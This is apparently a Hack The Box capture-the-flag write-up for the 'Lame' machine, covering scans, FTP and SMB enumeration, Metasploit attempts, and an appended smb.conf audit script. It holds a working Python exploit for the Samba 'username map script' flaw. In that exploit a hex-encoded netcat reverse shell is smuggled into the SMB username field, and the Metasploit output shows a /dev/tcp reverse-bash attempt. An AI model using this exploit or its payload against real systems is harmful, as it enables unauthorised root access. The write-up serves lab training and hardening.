Hack The Box | Lame
- Hack The Box | Lame
- Initial Nmap TCP Scan
- Full Nmap TCP Scan
- Initial Nmap TCP Scan Output
- Full Nmap TCP Scan Output
- Nmap scan of port 3632
- Thoughts based on Nmap scans:
- FTP - 21 Enumeration
- FTP - 21 Attempting Exploitation
- SMB - 139/445 Enumeration
- SMB - 139/445 Exploitation | Samba “username map script” Command Execution
- SMB - 139/445 Exploitation Manually
- DistCC Daemon - 3632 - Attempting Exploitation
Initial Nmap TCP Scan
nmap -sC -sV -oA nmap/initial-tcp-lame 10.10.10.3 -v
Full Nmap TCP Scan
sleep 300; nmap -p- -oA nmap/full-tcp-lame 10.10.10.3 -v
Initial Nmap TCP Scan Output
Nmap scan report for 10.10.10.3
Host is up (0.076s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.36
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 2h03m20s, deviation: 2h49m43s, median: 3m19s
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2021-05-25T13:06:56-04:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue May 25 10:04:14 2021 -- 1 IP address (1 host up) scanned in 58.68 seconds
Full Nmap TCP Scan Output
Nmap scan report for 10.10.10.3
Host is up (0.078s latency).
Not shown: 65530 filtered ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3632/tcp open distccd
Read data files from: /usr/bin/../share/nmap
# Nmap done at Tue May 25 10:07:26 2021 -- 1 IP address (1 host up) scanned in 122.25 seconds
Since there is one extra port open, I am going to run a scan similar to the initial Nmap TCP scan to enumerate the service version and perform a script scan, but only against this single port by using the -p flag to specify a port.
Nmap scan of port 3632
nmap -sC -sV -p 3632 10.10.10.3
Nmap scan report for 10.10.10.3
Host is up (0.081s latency).
PORT STATE SERVICE VERSION
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.85 seconds
Thoughts based on Nmap scans:
FTP - 21
Going down the list of open ports, the first port we have is port 21, FTP. This port has Anonymous FTP login allowed, which means that we can use an anonymous user to access FTP file shares. The Nmap scan also shows that this FTP server is running vsftpd 2.3.4. It is always a good habit to do a quick Google search of “vsftpd 2.3.4 exploit” or something similar whenever you have a service name and a version number. Looking on Google, we can see that Rapid7 has a post about vsftpd 2.3.4 having backdoor command execution, which seems pretty enticing, so we will definitely keep this in mind when we start exploiting things.
SSH - 22
Whenever I see SSH, it is usually one of the services I will not look into right away beyond searching for a possibly vulnerable version. The reason is that we need credentials. Sure, there is a chance we could brute-force our way in, but we still need a username at the very least. The only username we could try is the root user account, and that probably won’t do us any good. This does not mean this port will not be looked into later. Let’s say, for example, that we enumerate FTP and find credentials there. We could try those credentials everywhere we can to see if they are valid. Even if they are not, keep them in mind… maybe someone else used the same password?
SMB 139/445
SMB will definitely be a good port to look into for common misconfigurations. Are null sessions allowed? Null sessions could lead to file or information disclosure, which might give us a way to SSH into the server or log into FTP as a real user. Is SMB patched? There may be exploits that can be used against it, similar to the blog post I wrote on the HackTheBox Legacy box. Can we read or write files in an SMB share? That could lead to file downloads, uploads, execution, etc., similar to FTP.
DistCC Daemon - 3632
distccd is the DistCC Daemon. distccd is the server for the distcc distributed compiler. It accepts and runs compilation jobs for network clients (more info on distccd can be found on the distccd man page). Similar to FTP, since Nmap did display a version number for this service, there is another post by Rapid7 about command execution for the DistCC Daemon, so we will keep that in mind as well. Due to my lack of knowledge of the DistCC Daemon as of right now, this will probably be one of the last ports I attempt to enumerate. If it comes to the point where I need to interact with the DistCC Daemon, it will be a pretty fun learning experience.
FTP - 21 Enumeration
First, let’s go ahead and try to see if we can login as an anonymous user.
ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:bri5ee): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
And we were successfully able to log in as an anonymous user! Simply entering the user name anonymous and any password gained us access to the FTP share.
Let’s see if there is anything interesting in the FTP share we are in as an anonymous user.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 .
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 ..
226 Directory send OK.
And… nothing. Let’s see if we can use the PUT command to upload files into this FTP share. For this, I’m going to exit the FTP session, create a file using the touch command and then see if I can put it into the FTP share. Note that when uploading a file with the PUT command, the FTP client reads files from the local directory you were in when you connected to the FTP server.
┌──(root@kali)-[~/htb/lame]
└─# touch test_ftp_file
┌──(root@kali)-[~/htb/lame]
└─# ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:bri5ee): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files
ftp> put test_ftp_file
local: test_ftp_file remote: test_ftp_file
200 PORT command successful. Consider using PASV.
553 Could not create file.
So we can’t use the PUT command. Good to note down. I do not think this would have led anywhere important regardless. The reason is this: imagine there is an FTP server and there is also a web server on port 80. What if the web server was serving files from the same directory as the FTP share? Then we could use the PUT command to upload a reverse shell into the FTP share, set up a netcat listener, and browse to that file on the web server to catch a shell back. But since there is no web server, there isn’t much more we can do here with my knowledge of FTP exploits.
FTP - 21 Attempting Exploitation
It was mentioned that this vsftpd version is vulnerable to backdoor command execution. For simplicity, I am going to see if this even works by using the vsftpd 2.3.4 Metasploit Framework module.
msfconsole
=[ metasploit v6.0.41-dev ]
+ -- --=[ 2122 exploits - 1138 auxiliary - 360 post ]
+ -- --=[ 594 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: To save all commands executed since start up
to a file, use the makerc command
msf6 > search vsftpd 2.3.4
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor
msf6 > use 0
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 21 yes The target port (TCP)
Payload options (cmd/unix/interact):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhosts 10.10.10.3
rhosts => 10.10.10.3
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
I opened up msfconsole and used the search command to search for vsftpd 2.3.4. Once I found the module, you can simply type use # where # is the index shown by the search command; in this case it was 0, so use 0. I typed options to see what was needed for the exploit to work, which was just RHOSTS, the remote host, aka the target we are attacking. I ran the exploit command and the exploit didn’t work. Kind of a bummer. We can try this exploit again later if for some reason it just wasn’t working at this point, but let’s move on for now.
SMB - 139/445 Enumeration
To start off my enumeration of SMB, I first like to run scans. This is a really good habit to get into, as scans can run in the background while you do more manual testing. I am going to run a basic SMB enumeration using Nmap NSE scripts to scan for any potential vulnerabilities and to gather more information.
nmap --script smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse -p139,445 -oA enum_smb -T4 -v 10.10.10.3 -d --stats-every 10s
PORT STATE SERVICE REASON
139/tcp open netbios-ssn syn-ack ttl 63
445/tcp open microsoft-ds syn-ack ttl 63
Host script results:
| smb-enum-domains:
|_ ERROR: Couldn't get info for the domain: MSRPC call returned a fault (packet type)
| smb-enum-groups:
|_ ERROR: Couldn't enumerate groups: ERROR: No groups returned by samr_EnumDomainAliases()
| smb-enum-processes:
|_ ERROR: MSRPC call returned a fault (packet type)
| smb-enum-shares:
| account_used: <blank>
| \\10.10.10.3\ADMIN$:
| Type: STYPE_IPC
| Comment: IPC Service (lame server (Samba 3.0.20-Debian))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: <none>
| \\10.10.10.3\IPC$:
| Type: STYPE_IPC
| Comment: IPC Service (lame server (Samba 3.0.20-Debian))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| \\10.10.10.3\opt:
| Type: STYPE_DISKTREE
| Comment:
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: <none>
| \\10.10.10.3\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 1
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
| \\10.10.10.3\tmp:
| Type: STYPE_DISKTREE
| Comment: oh noes!
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
|_ Anonymous access: READ/WRITE
| smb-enum-users:
| LAME\backup (RID: 1068)
| Full name: backup
| Flags: Normal user account, Account disabled
| LAME\bin (RID: 1004)
| Full name: bin
| Flags: Normal user account, Account disabled
| LAME\bind (RID: 1210)
| Flags: Normal user account, Account disabled
| LAME\daemon (RID: 1002)
| Full name: daemon
| Flags: Normal user account, Account disabled
| LAME\dhcp (RID: 1202)
| Flags: Normal user account, Account disabled
| LAME\distccd (RID: 1222)
| Flags: Normal user account, Account disabled
| LAME\ftp (RID: 1214)
| Flags: Normal user account, Account disabled
| LAME\games (RID: 1010)
| Full name: games
| Flags: Normal user account, Account disabled
| LAME\gnats (RID: 1082)
| Full name: Gnats Bug-Reporting System (admin)
| Flags: Normal user account, Account disabled
| LAME\irc (RID: 1078)
| Full name: ircd
| Flags: Normal user account, Account disabled
| LAME\klog (RID: 1206)
| Flags: Normal user account, Account disabled
| LAME\libuuid (RID: 1200)
| Flags: Normal user account, Account disabled
| LAME\list (RID: 1076)
| Full name: Mailing List Manager
| Flags: Normal user account, Account disabled
| LAME\lp (RID: 1014)
| Full name: lp
| Flags: Normal user account, Account disabled
| LAME\mail (RID: 1016)
| Full name: mail
| Flags: Normal user account, Account disabled
| LAME\man (RID: 1012)
| Full name: man
| Flags: Normal user account, Account disabled
| LAME\msfadmin (RID: 3000)
| Full name: msfadmin,,,
| Flags: Normal user account
| LAME\mysql (RID: 1218)
| Full name: MySQL Server,,,
| Flags: Normal user account, Account disabled
| LAME\news (RID: 1018)
| Full name: news
| Full name: news
| Flags: Normal user account, Account disabled
| LAME\nobody (RID: 501)
| Full name: nobody
| Flags: Normal user account, Account disabled
| LAME\postfix (RID: 1212)
| Flags: Normal user account, Account disabled
| LAME\postgres (RID: 1216)
| Full name: PostgreSQL administrator,,,
| Flags: Normal user account, Account disabled
| LAME\proftpd (RID: 1226)
| Flags: Normal user account, Account disabled
| LAME\proxy (RID: 1026)
| Full name: proxy
| Flags: Normal user account, Account disabled
| LAME\root (RID: 1000)
| Full name: root
| Flags: Normal user account, Account disabled
| LAME\service (RID: 3004)
| Full name: ,,,
| Flags: Normal user account, Account disabled
| LAME\sshd (RID: 1208)
| Flags: Normal user account, Account disabled
| LAME\sync (RID: 1008)
| Full name: sync
| Flags: Normal user account, Account disabled
| LAME\sys (RID: 1006)
| Full name: sys
| Flags: Normal user account, Account disabled
| LAME\syslog (RID: 1204)
| Flags: Normal user account, Account disabled
| LAME\telnetd (RID: 1224)
| Flags: Normal user account, Account disabled
| LAME\tomcat55 (RID: 1220)
| Flags: Normal user account, Account disabled
| LAME\user (RID: 3002)
| Full name: just a user,111,,
| Flags: Normal user account
| LAME\uucp (RID: 1020)
| Full name: uucp
| Flags: Normal user account, Account disabled
| LAME\www-data (RID: 1066)
| Full name: www-data
|_ Flags: Normal user account, Account disabled
| smb-ls: Volume \\10.10.10.3\tmp
| SIZE TIME FILENAME
| <DIR> 2021-05-25T17:51:53 .
| <DIR> 2020-10-31T06:33:58 ..
| <DIR> 2021-05-25T17:04:44 vmware-root
| 0 2021-05-25T17:05:50 5563.jsvc_up
| 1600 2021-05-25T17:04:44 vgauthsvclog.txt.0
|_
| smb-mbenum:
| Master Browser
| LAME 0.0 lame server (Samba 3.0.20-Debian)
| Print server
| LAME 0.0 lame server (Samba 3.0.20-Debian)
| Server
| LAME 0.0 lame server (Samba 3.0.20-Debian)
| Server service
| LAME 0.0 lame server (Samba 3.0.20-Debian)
| Unix server
| LAME 0.0 lame server (Samba 3.0.20-Debian)
| Windows NT/2000/XP/2003 server
| LAME 0.0 lame server (Samba 3.0.20-Debian)
| Workstation
|_ LAME 0.0 lame server (Samba 3.0.20-Debian)
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2021-05-25T13:50:01-04:00
|_smb-print-text: false
| smb-psexec:
|_ ERROR: Couldn't create the service on the remote machine: MSRPC call returned a fault (packet type)
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
Final times for host: srtt: 75024 rttvar: 42450 to: 244824
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 10:48
Completed NSE at 10:48, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 10:48
Completed NSE at 10:48, 0.00s elapsed
Read from /usr/bin/../share/nmap: nmap-payloads nmap-services.
Nmap done: 1 IP address (1 host up) scanned in 140.53 seconds
Raw packets sent: 6 (240B) | Rcvd: 3 (116B)
Something interesting in this output is that there are two shares we can enumerate further because null sessions are allowed on SMB: there is anonymous READ/WRITE access to the tmp share and the IPC$ share. The tmp share catches my eye the most because its comment says oh noes!. It may be a rabbit hole, but we will see. We can also start researching whether this SMB version, Samba 3.0.20-Debian, is vulnerable.
Enumerating the tmp directory
We can enumerate SMB shares using smbclient, which is an ftp-like client to access SMB/CIFS resources on servers.
smbclient \\\\10.10.10.3\\tmp -N
We input the IP address and the share we want to access, as well as the -N flag, which means no password is sent, which is what anonymous users use anyway. Once we log in, we can use the dir command to see the contents of the tmp share.
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Tue May 25 10:57:40 2021
.. DR 0 Fri Oct 30 23:33:58 2020
.ICE-unix DH 0 Tue May 25 10:04:47 2021
vmware-root DR 0 Tue May 25 10:05:15 2021
.X11-unix DH 0 Tue May 25 10:05:13 2021
.X0-lock HR 11 Tue May 25 10:05:13 2021
5563.jsvc_up R 0 Tue May 25 10:05:50 2021
vgauthsvclog.txt.0 R 1600 Tue May 25 10:04:45 2021
7282168 blocks of size 1024. 5386532 blocks available
You can grab these files and put them onto your host by using the get command within smbclient. Going through each directory, grabbing the files and looking through them did not supply any information. I’m going to see if possibly this version is vulnerable to anything by doing a Google search.
SMB - 139/445 Exploitation | Samba “username map script” Command Execution
Looking on Google by typing “Samba 3.0.20 exploit”, I found a Rapid7 post about an exploit through the “username map script” configuration option within Samba. Since this also matches our version of Samba, I am going to test out this module. According to Rapid7, the description of this exploit is the following: “This module exploits a command execution vulnerability in Samba versions 3.0.20 through 3.0.25rc3 when using the non-default “username map script” configuration option. By specifying a username containing shell meta characters, attackers can execute arbitrary commands. No authentication is needed to exploit this vulnerability since this option is used to map usernames prior to authentication!”
There is a Metasploit Framework module already for this exploit, so let’s use msfconsole again.
msfconsole
=[ metasploit v6.0.41-dev ]
+ -- --=[ 2122 exploits - 1138 auxiliary - 360 post ]
+ -- --=[ 594 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: Save the current environment with the
save command, future console restarts will use this
environment again
msf6 > search samba 3.0.20
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/samba/usermap_script
msf6 > use 0
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 139 yes The target port (TCP)
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.126.147 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(multi/samba/usermap_script) > set lhost 10.10.14.36
lhost => 10.10.14.36
msf6 exploit(multi/samba/usermap_script) > set rhosts 10.10.10.3
rhosts => 10.10.10.3
msf6 exploit(multi/samba/usermap_script) > exploit
[*] Started reverse TCP handler on 10.10.14.36:4444
[*] Command shell session 1 opened (10.10.14.36:4444 -> 10.10.10.3:53690) at 2021-05-25 11:30:34 -0700
whoami
root
Using this Metasploit module we get a root command shell! To practice for the OSCP exam, I will be doing this manually as well.
SMB - 139/445 Exploitation Manually
Looking back at the Rapid7 post, it mentions that “by specifying a username containing shell meta characters, attackers can execute arbitrary commands. No authentication is needed to exploit this vulnerability since this option is used to map usernames prior to authentication!” This means that all we need to do is embed a command in the username field when connecting to the SMB server. A great way to do this is to utilize Python. I went ahead and wrote a Python script and added some comments to explain what is happening in this script.
#!/usr/bin/python3
# Import the SMBConnection class (pysmb performs file operations against a remote SMB/CIFS server)
from smb.SMBConnection import SMBConnection
# msfvenom -p cmd/unix/reverse_netcat LHOST=10.10.14.36 LPORT=1337 -f python
# This msfvenom command outputs a Unix netcat reverse shell calling back to host 10.10.14.36 on port 1337.
# The bytes below are the ASCII text of that shell command, which msfvenom prints in hex notation.
buf = b""
buf += b"\x6d\x6b\x66\x69\x66\x6f\x20\x2f\x74\x6d\x70\x2f\x62"
buf += b"\x73\x76\x6f\x65\x3b\x20\x6e\x63\x20\x31\x30\x2e\x31"
buf += b"\x30\x2e\x31\x34\x2e\x33\x36\x20\x31\x33\x33\x37\x20"
buf += b"\x30\x3c\x2f\x74\x6d\x70\x2f\x62\x73\x76\x6f\x65\x20"
buf += b"\x7c\x20\x2f\x62\x69\x6e\x2f\x73\x68\x20\x3e\x2f\x74"
buf += b"\x6d\x70\x2f\x62\x73\x76\x6f\x65\x20\x32\x3e\x26\x31"
buf += b"\x3b\x20\x72\x6d\x20\x2f\x74\x6d\x70\x2f\x62\x73\x76"
buf += b"\x6f\x65"
# The username supplied is a backtick substitution that runs the payload under nohup
# (nohup tells Unix systems not to stop the command once it has started, which matters because
# the command keeps running after the Samba session that launched it goes away).
# buf is a bytes object, so it is decoded to str before being joined with the username string.
# We also supply an empty password and our target_ip, which is 10.10.10.3.
username = "/=`nohup " + buf.decode() + "`"
password = ""
target_ip = "10.10.10.3"
# The SMBConnection class requires (userID, password, client_machine_name, server_name, use_ntlm_v2 (boolean value)).
# We do not need real values for client_machine_name and server_name, and use_ntlm_v2 is set to False since it is not needed.
connection = SMBConnection(username, password, "Temp1", "Temp2", use_ntlm_v2=False)
# Establish an SMB connection using .connect(target_ip, port# (445))
connection.connect(target_ip, 445)
All we need to do now is set up a netcat listener on port 1337 using nc -lvnp 1337 and run our Python script with python [name_of_script].py.
nc -lvnp 1337
python samba-3.0.20-exploit.py
nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.14.36] from (UNKNOWN) [10.10.10.3] 50439
id
uid=0(root) gid=0(root)
And again we have a root shell!
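From the defender’s side, the three weaknesses this write-up leans on are all visible in smb.conf: the non-default “username map script” option that hands the client-supplied username to a shell script before authentication, message signing left disabled (flagged by Nmap above as “dangerous, but default”), and a guest-writable tmp share. The following script is an added example, not the author’s code or any Samba tooling: it parses smb.conf syntax (sections, key = value, ; or # comments) and reports those three settings, with a constructed weak config beside a hardened one; the script path and share contents are made up for the example.

```python
import re
from typing import Dict, List

# Constructed smb.conf mirroring what the scans reported: a "username map
# script" in [global], no "server signing" line, and a guest-writable share.
WEAK_SMB_CONF = """[global]
   workgroup = WORKGROUP
   security = user
   username map script = /etc/samba/scripts/mapusers.sh
   map to guest = bad user
[tmp]
   comment = oh noes!
   path = /tmp
   read only = no
   guest ok = yes
[opt]
   path = /opt
   read only = yes
"""
# The same server with the three weak settings corrected (also constructed).
HARDENED_SMB_CONF = """[global]
   workgroup = WORKGROUP
   security = user
   server signing = mandatory
[tmp]
   path = /tmp
   read only = yes
   guest ok = no
"""
_SECTION = re.compile(r"^\[([^\]]+)\]$")
_KV = re.compile(r"^([^=;#]+?)\s*=\s*(.*)$")

def parse_smb_conf(text: str) -> Dict[str, Dict[str, str]]:
    """Parse smb.conf into {section: {key: value}}; keys are lower-cased with
    whitespace collapsed, since Samba matches parameter names loosely."""
    sections: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        sec = _SECTION.match(line)
        if sec:
            current = sec.group(1).strip().lower()
            sections.setdefault(current, {})
            continue
        kv = _KV.match(line)
        if kv and current is not None:
            key = " ".join(kv.group(1).lower().split())
            sections[current][key] = kv.group(2).strip()  # later duplicate wins
    return sections

def _yes(value: str) -> bool:
    return value.strip().lower() in {"yes", "true", "1"}

def _writable(opts: Dict[str, str]) -> bool:
    # "writable"/"writeable" are synonyms; "read only" is the inverse form.
    for key in ("writable", "writeable"):
        if key in opts:
            return _yes(opts[key])
    if "read only" in opts:
        return not _yes(opts["read only"])
    return False  # shares are read-only unless told otherwise

def audit_smb_conf(text: str) -> List[str]:
    """Return one finding per weak setting; an empty list means clean."""
    conf = parse_smb_conf(text)
    glob = conf.get("global", {})
    findings: List[str] = []
    script = glob.get("username map script")
    if script:
        findings.append("global: 'username map script' = %s; the client-supplied "
                        "username reaches this script before authentication" % script)
    signing = glob.get("server signing", "<unset>")
    if signing.lower() != "mandatory":
        findings.append("global: 'server signing' is %s, not mandatory" % signing)
    for name, opts in conf.items():
        # "public" is Samba's synonym for "guest ok"
        guest = _yes(opts.get("guest ok", opts.get("public", "no")))
        if name != "global" and guest and _writable(opts):
            findings.append("share [%s]: guest-accessible and writable (comment: %r)"
                            % (name, opts.get("comment", "")))
    return findings
```

Running audit_smb_conf over the weak config yields three findings and over the hardened config none; pointing it at a real /etc/samba/smb.conf is a quick way to confirm none of these settings survived an upgrade.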
DistCC Daemon - 3632 - Attempting Exploitation
When looking into the DistCC Daemon, we saw that Rapid7 had posted about an exploit for it with a Metasploit Framework module. Let’s go ahead and try this as well.
┌──(root@kali)-[~/htb/lame]
└─# msfconsole
=[ metasploit v6.0.41-dev ]
+ -- --=[ 2122 exploits - 1138 auxiliary - 360 post ]
+ -- --=[ 594 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: Display the Framework log using the
log command, learn more with help log
msf6 > search distcc
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/misc/distcc_exec 2002-02-01 excellent Yes DistCC Daemon Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/misc/distcc_exec
msf6 > use 0
msf6 exploit(unix/misc/distcc_exec) > set payload payload/cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf6 exploit(unix/misc/distcc_exec) > set lhost 10.10.14.36
lhost => 10.10.14.36
msf6 exploit(unix/misc/distcc_exec) > set rhost 10.10.10.3
rhost => 10.10.10.3
msf6 exploit(unix/misc/distcc_exec) > exploit
[*] Started reverse TCP handler on 10.10.14.36:4444
[*] 10.10.10.3:3632 - stderr: #: 97: Bad file descriptor
[*] 10.10.10.3:3632 - stderr: #: /dev/tcp/10.10.14.36/4444: No such file or directory
[*] Exploit completed, but no session was created.
And… nothing as well. Seems like SMB was the path to get to root for this box. Overall, it was a pretty fun box to exploit manually!